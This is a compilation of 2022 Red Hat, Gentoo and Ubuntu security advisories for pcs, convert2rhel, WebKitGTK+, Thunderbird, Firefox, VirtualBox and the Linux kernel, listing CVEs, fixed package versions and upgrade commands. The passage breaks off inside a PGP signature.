Red Hat Security Advisory 2022-6313-01 - The pcs packages provide a command-line configuration system for the Pacemaker and Corosync utilities. Issues addressed include a privilege escalation vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: pcs security update  
Advisory ID:       RHSA-2022:6313-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6313  
Issue date:        2022-09-01  
CVE Names:         CVE-2022-2735  
====================================================================  
1. Summary:

An update for pcs is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux High Availability (v. 9) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Resilient Storage (v. 9) - ppc64le, s390x, x86_64

3. Description:

The pcs packages provide a command-line configuration system for the  
Pacemaker and Corosync utilities.

Security Fix(es):

* pcs: obtaining an authentication token for hacluster user could lead to  
privilege escalation (CVE-2022-2735)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2116815 - CVE-2022-2735 pcs: obtaining an authentication token for hacluster user could lead to privilege escalation

6. Package List:

Red Hat Enterprise Linux High Availability (v. 9):

Source:  
pcs-0.11.1-10.el9_0.2.src.rpm

aarch64:  
pcs-0.11.1-10.el9_0.2.aarch64.rpm  
pcs-snmp-0.11.1-10.el9_0.2.aarch64.rpm

ppc64le:  
pcs-0.11.1-10.el9_0.2.ppc64le.rpm  
pcs-snmp-0.11.1-10.el9_0.2.ppc64le.rpm

s390x:  
pcs-0.11.1-10.el9_0.2.s390x.rpm  
pcs-snmp-0.11.1-10.el9_0.2.s390x.rpm

x86_64:  
pcs-0.11.1-10.el9_0.2.x86_64.rpm  
pcs-snmp-0.11.1-10.el9_0.2.x86_64.rpm

Red Hat Enterprise Linux Resilient Storage (v. 9):

Source:  
pcs-0.11.1-10.el9_0.2.src.rpm

ppc64le:  
pcs-0.11.1-10.el9_0.2.ppc64le.rpm  
pcs-snmp-0.11.1-10.el9_0.2.ppc64le.rpm

s390x:  
pcs-0.11.1-10.el9_0.2.s390x.rpm  
pcs-snmp-0.11.1-10.el9_0.2.s390x.rpm

x86_64:  
pcs-0.11.1-10.el9_0.2.x86_64.rpm  
pcs-snmp-0.11.1-10.el9_0.2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-2735  
https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id!16839

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYxDdStzjgjWX9erEAQjUJg/9Hov0AK9DBgtNQt6oxIIrWhs7TYvehdzJ  
qIPh1BbZmyuRrOMM1a7hrMH9UYfBK0pwrXs+U0NkY6NjKflQq3VKAi1nGuZbLy3r  
tkX032KlknHbSDVyHUl8mKsPRVYW/obelia23F22IIAXdjU/aEY3UzGMwQGW9lh9  
CVKVNu2/fDhZtII7AUJw5UlOdvlMSaeND0RmqiOhRJSoaE8jP2pLklL1Q4L48txX  
Dhyq2CzCgGBHSkcZ6Yn3FRus1kTRRDjIMQABLZVSSsZF8xTMI3EDPmagl8ynS5uE  
LZk5k3BNNGXsyP8sF23iZ66z5Ue7mFbqioRcY8pSrkOZ9nM66S5+TA3TNmeK0Gde  
Pxhdryo9Btu1Tkku7NwaY1uZD14wgj4O6gTCDSoPQy+PcbUKlOxDm3DBCfZwHl4r  
BB2qOmbSkBUcYLV10qPzdik8UTl64dB2z7DXWSy3nqpD0avTnDe66JwXcBYmVK44  
DaVWe2YKfkNtQQJ3mf2WuFqRmcuOSUQloWJvTmlzDwSy7kpBJTDCfnBQORIbkYa7  
eIc8PUj0GjfZqRZ7Ku+y0UKR0UOpXLtm4V0TsdAF9V6kbLd4aA7Y1tP+3RyFfsTR  
SMl77kwTVV52m1KZ1bLC6hEnWMKk9MdaZhY+HFSKWy9nkYwmtV42YR1UXcBeJ5OU  
CQXUykjXU9c=KFjU  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6313-01

Gentoo Linux Security Advisory 202208-39 - Multiple vulnerabilities have been found in WebkitGTK+, the worst of which could result in the arbitrary execution of code. Versions less than 2.36.7 are affected.

    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -Gentoo Linux Security Advisory                           GLSA 202208-39- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -                                           https://security.gentoo.org/- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High    Title: WebKitGTK+: Multiple Vulnerabilities     Date: August 31, 2022     Bugs: #866494, #864427, #856445, #861740, #837305, #845252, #839984, #833568, #832990       ID: 202208-39- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -Synopsis=======Multiple vulnerabilities have been found in WebkitGTK+, the worst ofwhich could result in the arbitrary execution of code.Background=========WebKitGTK+ is a full-featured port of the WebKit rendering engine,suitable for projects requiring any kind of web integration, from hybridHTML/CSS applications to full-fledged web browsers.Affected packages================    -------------------------------------------------------------------     Package              /     Vulnerable     /            Unaffected    -------------------------------------------------------------------  1  net-libs/webkit-gtk        < 2.36.7                    >= 2.36.7Description==========Multiple vulnerabilities have been discovered in WebKitGTK+. Pleasereview the CVE identifiers referenced below for details.Impact=====Please review the referenced CVE identifiers for details.Workaround=========There is no known workaround at this time.Resolution=========All WebKitGTK+ users should upgrade to the latest version:  # emerge --sync  # emerge --ask --oneshot --verbose ">=net-libs/webkit-gtk-2.36.7"References=========[ 1 ] CVE-2022-2294      https://nvd.nist.gov/vuln/detail/CVE-2022-2294[ 2 ] CVE-2022-22589      https://nvd.nist.gov/vuln/detail/CVE-2022-22589[ 3 ] CVE-2022-22590      https://nvd.nist.gov/vuln/detail/CVE-2022-22590[ 4 ] CVE-2022-22592      https://nvd.nist.gov/vuln/detail/CVE-2022-22592[ 5 ] CVE-2022-22620      https://nvd.nist.gov/vuln/detail/CVE-2022-22620[ 6 ] CVE-2022-22624      https://nvd.nist.gov/vuln/detail/CVE-2022-22624[ 7 ] CVE-2022-22628      https://nvd.nist.gov/vuln/detail/CVE-2022-22628[ 8 ] CVE-2022-22629      https://nvd.nist.gov/vuln/detail/CVE-2022-22629[ 9 ] CVE-2022-22662      https://nvd.nist.gov/vuln/detail/CVE-2022-22662[ 10 ] CVE-2022-22677      https://nvd.nist.gov/vuln/detail/CVE-2022-22677[ 11 ] CVE-2022-26700      https://nvd.nist.gov/vuln/detail/CVE-2022-26700[ 12 ] CVE-2022-26709      https://nvd.nist.gov/vuln/detail/CVE-2022-26709[ 13 ] CVE-2022-26710      https://nvd.nist.gov/vuln/detail/CVE-2022-26710[ 14 ] CVE-2022-26716      https://nvd.nist.gov/vuln/detail/CVE-2022-26716[ 15 ] CVE-2022-26717      https://nvd.nist.gov/vuln/detail/CVE-2022-26717[ 16 ] CVE-2022-26719      https://nvd.nist.gov/vuln/detail/CVE-2022-26719[ 17 ] CVE-2022-30293      https://nvd.nist.gov/vuln/detail/CVE-2022-30293[ 18 ] CVE-2022-30294      https://nvd.nist.gov/vuln/detail/CVE-2022-30294[ 19 ] CVE-2022-32784      https://nvd.nist.gov/vuln/detail/CVE-2022-32784[ 20 ] CVE-2022-32792      https://nvd.nist.gov/vuln/detail/CVE-2022-32792[ 21 ] CVE-2022-32893      https://nvd.nist.gov/vuln/detail/CVE-2022-32893[ 22 ] WSA-2022-0002      https://webkitgtk.org/security/WSA-2022-0002.html[ 23 ] WSA-2022-0003      https://webkitgtk.org/security/WSA-2022-0003.html[ 24 ] WSA-2022-0007      https://webkitgtk.org/security/WSA-2022-0007.html[ 25 ] WSA-2022-0008      https://webkitgtk.org/security/WSA-2022-0008.htmlAvailability===========This GLSA and any updates to it are available for viewing atthe Gentoo Security Website: https://security.gentoo.org/glsa/202208-39Concerns?========Security is a primary focus of Gentoo Linux and ensuring theconfidentiality and security of our users' machines is of utmostimportance to us. Any security concerns should be addressed tosecurity@gentoo.org or alternatively, you may file a bug athttps://bugs.gentoo.org.License======Copyright 2022 Gentoo Foundation, Inc; referenced textbelongs to its owner(s).The contents of this document are licensed under theCreative Commons - Attribution / Share Alike license.https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202208-39

Gentoo Linux Security Advisory 202208-38 - Multiple vulnerabilities have been found in Mozilla Thunderbird, the world of which could result in arbitrary code execution. Versions less than 91.13.0 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202208-38  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Mozilla Thunderbird: Multiple Vulnerabilities  
     Date: August 31, 2022  
     Bugs: #866217  
       ID: 202208-38

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been found in Mozilla Thunderbird, the  
world of which could result in arbitrary code execution.

Background  
=========  
Mozilla Thunderbird is a popular open-source email client from the  
Mozilla project.

Affected packages  
================  
    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  mail-client/thunderbird    < 91.13.0                  >= 91.13.0  
  2  mail-client/thunderbird-bin< 91.13.0                  >= 91.13.0

Description  
==========  
Multiple vulnerabilities have been discovered in Mozilla Thunderbird.  
Please review the CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All Mozilla Thunderbird binary users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=mail-client/thunderbird-bin-102.2.0"

All Mozilla Thunderbird users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=mail-client/thunderbird-102.2.0"

References  
=========  
[ 1 ] CVE-2022-38472  
      https://nvd.nist.gov/vuln/detail/CVE-2022-38472  
[ 2 ] CVE-2022-38473  
      https://nvd.nist.gov/vuln/detail/CVE-2022-38473  
[ 3 ] CVE-2022-38476  
      https://nvd.nist.gov/vuln/detail/CVE-2022-38476  
[ 4 ] CVE-2022-38477  
      https://nvd.nist.gov/vuln/detail/CVE-2022-38477  
[ 5 ] CVE-2022-38478  
      https://nvd.nist.gov/vuln/detail/CVE-2022-38478

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202208-38

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2022 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202208-38

Gentoo Linux Security Advisory 202208-37 - Multiple vulnerabilities have been discovered in Mozilla Firefox, the worst of which could result in arbitrary code execution. Versions less than 104:rapid are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202208-37  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Mozilla Firefox: Multiple Vulnerabilities  
     Date: August 31, 2022  
     Bugs: #866215  
       ID: 202208-37

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been discovered in Mozilla Firefox, the  
worst of which could result in arbitrary code execution.

Background  
=========  
Mozilla Firefox is a popular open-source web browser from the Mozilla  
project.

Affected packages  
================  
    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  www-client/firefox         < 104:rapid              >= 104:rapid  
                                < 91.13.0:esr          >= 91.13.0:esr  
  2  www-client/firefox-bin     < 104:rapid              >= 104:rapid

Description  
==========  
Multiple vulnerabilities have been discovered in Mozilla Firefox. Please  
review the CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All Mozilla Firefox ESR users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/firefox-91.13.0"

All Mozilla Firefox ESR binary users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/firefox-bin-91.13.0"

All Mozilla Firefox users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/firefox-104.0"

All Mozilla Firefox binary users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/firefox-bin-104.0"

References  
=========  
[ 1 ] CVE-2022-38472  
      https://nvd.nist.gov/vuln/detail/CVE-2022-38472  
[ 2 ] CVE-2022-38473  
      https://nvd.nist.gov/vuln/detail/CVE-2022-38473  
[ 3 ] CVE-2022-38474  
      https://nvd.nist.gov/vuln/detail/CVE-2022-38474  
[ 4 ] CVE-2022-38475  
      https://nvd.nist.gov/vuln/detail/CVE-2022-38475  
[ 5 ] CVE-2022-38476  
      https://nvd.nist.gov/vuln/detail/CVE-2022-38476  
[ 6 ] CVE-2022-38477  
      https://nvd.nist.gov/vuln/detail/CVE-2022-38477  
[ 7 ] CVE-2022-38478  
      https://nvd.nist.gov/vuln/detail/CVE-2022-38478

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202208-37

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2022 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202208-37

Gentoo Linux Security Advisory 202208-36 - Multiple vulnerabilities have been discovered in Oracle Virtualbox, the worst of which could result in root privilege escalation. Versions less than 6.1.36 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202208-36  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Oracle VirtualBox: Multiple Vulnerabilities  
     Date: August 31, 2022  
     Bugs: #785445, #803134, #820425, #831440, #839990, #859391  
       ID: 202208-36

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been discovered in Oracle Virtualbox, the  
worst of which could result in root privilege escalation.

Background  
=========  
VirtualBox is a powerful virtualization product from Oracle.

Affected packages  
================  
    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  app-emulation/virtualbox   < 6.1.36                    >= 6.1.36  
  2  app-emulation/virtualbox-additions< 6.1.36             >= 6.1.36  
  3  app-emulation/virtualbox-extpack-oracle< 6.1.36        >= 6.1.36  
  4  app-emulation/virtualbox-guest-additions< 6.1.36       >= 6.1.36  
  5  app-emulation/virtualbox-modules< 6.1.36               >= 6.1.36

Description  
==========  
Multiple vulnerabilities have been discovered in VirtualBox. Please  
review the CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All VirtualBox users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-emulation/virtualbox-6.1.36"

References  
=========  
[ 1 ] CVE-2021-2145  
      https://nvd.nist.gov/vuln/detail/CVE-2021-2145  
[ 2 ] CVE-2021-2250  
      https://nvd.nist.gov/vuln/detail/CVE-2021-2250  
[ 3 ] CVE-2021-2264  
      https://nvd.nist.gov/vuln/detail/CVE-2021-2264  
[ 4 ] CVE-2021-2266  
      https://nvd.nist.gov/vuln/detail/CVE-2021-2266  
[ 5 ] CVE-2021-2279  
      https://nvd.nist.gov/vuln/detail/CVE-2021-2279  
[ 6 ] CVE-2021-2280  
      https://nvd.nist.gov/vuln/detail/CVE-2021-2280  
[ 7 ] CVE-2021-2281  
      https://nvd.nist.gov/vuln/detail/CVE-2021-2281  
[ 8 ] CVE-2021-2282  
      https://nvd.nist.gov/vuln/detail/CVE-2021-2282  
[ 9 ] CVE-2021-2283  
      https://nvd.nist.gov/vuln/detail/CVE-2021-2283  
[ 10 ] CVE-2021-2284  
      https://nvd.nist.gov/vuln/detail/CVE-2021-2284  
[ 11 ] CVE-2021-2285  
      https://nvd.nist.gov/vuln/detail/CVE-2021-2285  
[ 12 ] CVE-2021-2286  
      https://nvd.nist.gov/vuln/detail/CVE-2021-2286  
[ 13 ] CVE-2021-2287  
      https://nvd.nist.gov/vuln/detail/CVE-2021-2287  
[ 14 ] CVE-2021-2291  
      https://nvd.nist.gov/vuln/detail/CVE-2021-2291  
[ 15 ] CVE-2021-2296  
      https://nvd.nist.gov/vuln/detail/CVE-2021-2296  
[ 16 ] CVE-2021-2297  
      https://nvd.nist.gov/vuln/detail/CVE-2021-2297  
[ 17 ] CVE-2021-2306  
      https://nvd.nist.gov/vuln/detail/CVE-2021-2306  
[ 18 ] CVE-2021-2309  
      https://nvd.nist.gov/vuln/detail/CVE-2021-2309  
[ 19 ] CVE-2021-2310  
      https://nvd.nist.gov/vuln/detail/CVE-2021-2310  
[ 20 ] CVE-2021-2312  
      https://nvd.nist.gov/vuln/detail/CVE-2021-2312  
[ 21 ] CVE-2021-2409  
      https://nvd.nist.gov/vuln/detail/CVE-2021-2409  
[ 22 ] CVE-2021-2442  
      https://nvd.nist.gov/vuln/detail/CVE-2021-2442  
[ 23 ] CVE-2021-2443  
      https://nvd.nist.gov/vuln/detail/CVE-2021-2443  
[ 24 ] CVE-2021-2454  
      https://nvd.nist.gov/vuln/detail/CVE-2021-2454  
[ 25 ] CVE-2021-2475  
      https://nvd.nist.gov/vuln/detail/CVE-2021-2475  
[ 26 ] CVE-2021-35538  
      https://nvd.nist.gov/vuln/detail/CVE-2021-35538  
[ 27 ] CVE-2021-35540  
      https://nvd.nist.gov/vuln/detail/CVE-2021-35540  
[ 28 ] CVE-2021-35542  
      https://nvd.nist.gov/vuln/detail/CVE-2021-35542  
[ 29 ] CVE-2021-35545  
      https://nvd.nist.gov/vuln/detail/CVE-2021-35545  
[ 30 ] CVE-2022-21394  
      https://nvd.nist.gov/vuln/detail/CVE-2022-21394  
[ 31 ] CVE-2022-21465  
      https://nvd.nist.gov/vuln/detail/CVE-2022-21465  
[ 32 ] CVE-2022-21471  
      https://nvd.nist.gov/vuln/detail/CVE-2022-21471  
[ 33 ] CVE-2022-21487  
      https://nvd.nist.gov/vuln/detail/CVE-2022-21487  
[ 34 ] CVE-2022-21488  
      https://nvd.nist.gov/vuln/detail/CVE-2022-21488  
[ 35 ] CVE-2022-21554  
      https://nvd.nist.gov/vuln/detail/CVE-2022-21554  
[ 36 ] CVE-2022-21571  
      https://nvd.nist.gov/vuln/detail/CVE-2022-21571

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202208-36

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2022 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202208-36

Ubuntu Security Notice 5591-1 - It was discovered that the virtual terminal driver in the Linux kernel did not properly handle VGA console font changes, leading to an out-of-bounds write. A local attacker could use this to cause a denial of service or possibly execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-5591-1August 31, 2022linux-azure, linux-gcp, linux-hwe vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 16.04 ESM- Ubuntu 14.04 ESMSummary:The system could be made to crash or run programs as an administrator.Software Description:- linux-azure: Linux kernel for Microsoft Azure Cloud systems- linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems- linux-hwe: Linux hardware enablement (HWE) kernelDetails:It was discovered that the virtual terminal driver in the Linux kernel did not properly handle VGA console font changes, leading to an out-of-bounds write. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 16.04 ESM:   linux-image-4.15.0-1135-gcp     4.15.0-1135.151~16.04.2   linux-image-4.15.0-1150-azure   4.15.0-1150.165~16.04.1   linux-image-4.15.0-192-generic  4.15.0-192.203~16.04.1   linux-image-4.15.0-192-lowlatency  4.15.0-192.203~16.04.1   linux-image-azure               4.15.0.1150.137   linux-image-gcp                 4.15.0.1135.129   linux-image-generic-hwe-16.04   4.15.0.192.179   linux-image-gke                 4.15.0.1135.129   linux-image-lowlatency-hwe-16.04  4.15.0.192.179   linux-image-oem                 4.15.0.192.179   linux-image-virtual-hwe-16.04   4.15.0.192.179Ubuntu 14.04 ESM:   linux-image-4.15.0-1150-azure   4.15.0-1150.165~14.04.1   linux-image-azure               4.15.0.1150.119After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-5591-1   CVE-2021-33656

Ubuntu Security Notice USN-5591-1

Red Hat Security Advisory 2022-6266-01 - The convert2rhel package provides the Convert2RHEL utility, which performs operating system conversion. During the conversion process, Convert2RHEL replaces all RPM packages from the original Linux distribution with their Red Hat Enteprise Linux versions.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: convert2rhel security update  
Advisory ID:       RHSA-2022:6266-01  
Product:           Convert2RHEL  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6266  
Issue date:        2022-08-31  
CVE Names:         CVE-2022-0851  
====================================================================  
1. Summary:

An update for convert2rhel is now available for Convert2RHEL for RHEL-6.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Convert2RHEL for RHEL-6 - noarch

3. Description:

The convert2rhel package provides the Convert2RHEL utility, which performs  
operating system conversion. During the conversion process, Convert2RHEL  
replaces all RPM packages from the original Linux distribution with their  
Red Hat Enteprise Linux versions.

Security Fix(es):

* convert2rhel: Activation key passed via command line by code  
(CVE-2022-0851)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2060217 - CVE-2022-0851 convert2rhel: Activation key passed via command line by code

6. Package List:

Convert2RHEL for RHEL-6:

Source:  
convert2rhel-1.0-1.el6.src.rpm

noarch:  
convert2rhel-1.0-1.el6.noarch.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-0851  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYw+Lw9zjgjWX9erEAQiA1Q//WjjVIPysvXmlSvUNCLj+48HrseFURAVL  
Ef6ujwSEBOQFH7sD8QKNr//QUGYQFNoYaw3X4NPvM6SN4T0nUmSKbry6yNqxQ8+W  
r6IYPRpn4SShKdltVuehADtPCeU14As3sO2GqpFAActSMpvH52Jbb2TTVyM4iQG+  
n1agBlI2zCfnv5qi9WSpiPzV5ln7jx3YXhCurNPqh2FMOVpkjPFgklR1Zo10RUo7  
uaM0GQSbyCLxKl8jz8WIxg0ryxD8shrJIARw1Z6m+e4D/W8C0YZRwaRjaisCLcHN  
o+OCFnG/xSQ4ZGpzADIhCsn3hPlCVuvEdQeXs2rNzsjHTKllobGqYiorV35vPyCp  
Dy4biVdm6GQT0wTWMC79MYV7HgeUKnTHI4KUz8SBMOF7px49tFWjEQ+aSSiPtoSJ  
lhE4QI/lCdkeWRMB10mo2AQViiFrZGglpRbJ8G/1Own1VPEvaHsNzopG57pXzOpv  
98Z7ujh4yn+Ble/ya2zWD5MqQxf8SHKCV8KX0Cc04MR5K9VoCPfuOv2mtlWsyQBt  
VZHXcj+CNdd/nuCKjDFTIKdrE3Tn87SW6SavN++Te9+c30CbiraRY38t6NLHYzIk  
1VwzQddlIeWaPMDhbbBKamwbd5MvLq3MDoNPgHydqM3yGVV96emYR9W2NrSg/Vwo  
e9/+w8dGpO8=1uIH  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6266-01

Red Hat Security Advisory 2022-6269-01 - The convert2rhel package provides the Convert2RHEL utility, which performs operating system conversion. During the conversion process, Convert2RHEL replaces all RPM packages from the original Linux distribution with their Red Hat Enterprise Linux versions.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: convert2rhel security, bug fix, and enhancement update  
Advisory ID:       RHSA-2022:6269-01  
Product:           Convert2RHEL  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6269  
Issue date:        2022-08-31  
CVE Names:         CVE-2022-0851  
====================================================================  
1. Summary:

An update for convert2rhel is now available for Convert2RHEL for RHEL-8.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Convert2RHEL for RHEL-8 - noarch

3. Description:

The convert2rhel package provides the Convert2RHEL utility, which performs  
operating system conversion. During the conversion process, Convert2RHEL  
replaces all RPM packages from the original Linux distribution with their  
Red Hat Enterprise Linux versions.

Security Fix(es):

* convert2rhel: Activation key passed via command line by code  
(CVE-2022-0851)

Bug Fix(es):

* Using dbus API for RHSM registration to safely pass the activation key  
* Verifying GPG key for UBI repositories

Deprecation:

* Deprecated `-f|--password-from-file` parameter option.

Enhancement(s):

* Checking if a new version of convert2rhel is available  
* Warning if multiple authentication sources are specified  
* Fixed logging error with unavailable RHSM certificate  
* Fixed handling shim-x64 package protection on non-UEFI systems

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2060217 - CVE-2022-0851 convert2rhel: Activation key passed via command line by code

6. JIRA issues fixed (https://issues.jboss.org/):

RHELC-126 - Unknown tag in rpm query format call  
RHELC-251 - Move yum clean metadata and yum makecache to the beginning of conversion  
RHELC-332 - Check for a new version available  
RHELC-367 - Update grub bootloader images  
RHELC-411 - Add the ability to take the activation key from a config file rather than the command line  
RHELC-413 - Check whether the user has specified multiple authentication sources and warn if so  
RHELC-45 - Incorrectly logging error with unavailable RHSM certificate  
RHELC-597 - Use dbus API for RHSM registration  
RHELC-678 - Remove UEFI condition from shim-x64 workaround

7. Package List:

Convert2RHEL for RHEL-8:

Source:  
convert2rhel-1.0-1.el8.src.rpm

noarch:  
convert2rhel-1.0-1.el8.noarch.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

8. References:

https://access.redhat.com/security/cve/CVE-2022-0851  
https://access.redhat.com/security/updates/classification/#moderate

9. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYw+Lx9zjgjWX9erEAQgtGQ//TVXv6XKuy6eVkI6FW6HAgcMx0jzdg+ao  
